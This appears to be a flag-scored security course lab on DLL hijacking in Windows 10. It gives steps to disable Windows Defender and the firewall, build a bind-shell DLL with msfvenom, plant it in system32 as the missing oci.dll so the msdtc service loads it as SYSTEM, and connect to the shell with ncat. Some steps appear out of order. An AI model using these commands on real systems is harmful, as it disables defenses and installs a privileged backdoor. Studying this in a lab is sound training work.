Click Start and type DEFENDER.
Open "Windows Defender Settings".
Click "Virus & threat protection".
Under "Virus & threat protection settings", click "Manage settings".
Turn off "Real-time protection" and. "Cloud-delivered protection", as shown below.
Leave this Windows Security window open--you'll need it again after installing Metasploit.
In the "Installing Metasploit on Windows" section, click the "latest Windows installer" link.
Put the metasploitframework-latest.msi file in your Downloads folder.
RIght-click the metasploitframework-latest.msi file and click Properties. Click Unblock. Click OK. Open an Administrator Command Prompt and execute these commands:
Click through the installer, accepting all the default options.
cd \Users\IEuser\Downloads metasploitframework-latest.msi
Click the "Add an exclusion". Click Folder.
Select C:\metasploit-framework. Click "Select folder". Approve the privilege escalation.
The metasploit-framework now appears as an Exclusion, as shown below.
The DLL is created, as shown below.
C:\metasploit-framework\bin\msfvenom -p windows/x64/shell_bind_tcp -f dll -o shellbind.dll
In the lower center, click Public network.
Turn the firewall off.
Find the "Distributed Transaction Coordinator" service, as shown below.
From the description, you can see that this process is not important, and from the Status, you can see that it starts automatically.
Right-click "Distributed Transaction Coordinator" and click Properties. Click the "Log On" tab. Here you can see that this processes runs as System, the highest possible privileges.
If it's not System, but something else, like Network Service Account, change it to "Local System Account, as shown below.
Click OK. Click OK again.
At the lower left of the desktop, click the magnifying glass. Type PROCMON and open procmon.
Configure the two filters shown at the top of the list below and click OK.
In Services, start the "Distributed Transaction Coordinator" service.
Find the oci.dll entry, as shown below. This DLL was not found. This is a defect in Windows 10, which we will exploit.
In Process Monitor, in the toolbar, click the third icon (the magnifying glass) to stop the monitoring.
Find the msdtc.exe process and click it, as shown below.
From the menu bar, click View, "Show Lower Pane". Then click View, "Lower Pane View", DLLs.
This process uses many DLLs, but oci.dll is missing, as shown below.
net stop msdtc copy shellbind.dll c:\windows\system32\oci.dll
Then click the third icon (the magnifying glass) to start monitoring.
In the Administrator Command Prompt window, execute this command:
Now the oci.dll file loads as shown below.
net start msdtc
PMA 124.1: Detail (10 pts)The flag is in the Detail field for the first event for oci.dll, covered by a green rectangle in the image below.
PMA 124.2: Using the Shell (5 pts)Open a new Command Prompt window, and execute these commands:The flag is in covered by a green rectangle in the image below.
ncat 127.0.0.1 4444 whoami
Open Resource Monitor and, on the Network tab, check to see if a process is listening on port 4444, as shown below.
When I did it, the PID was 3200.
If a process is listening on that port, end it in Task Manager,on the Details tab, as shown below.
Then, in an Administrator Command Prompt, execute this command:
Windows Defender adjustments added 3-23-2021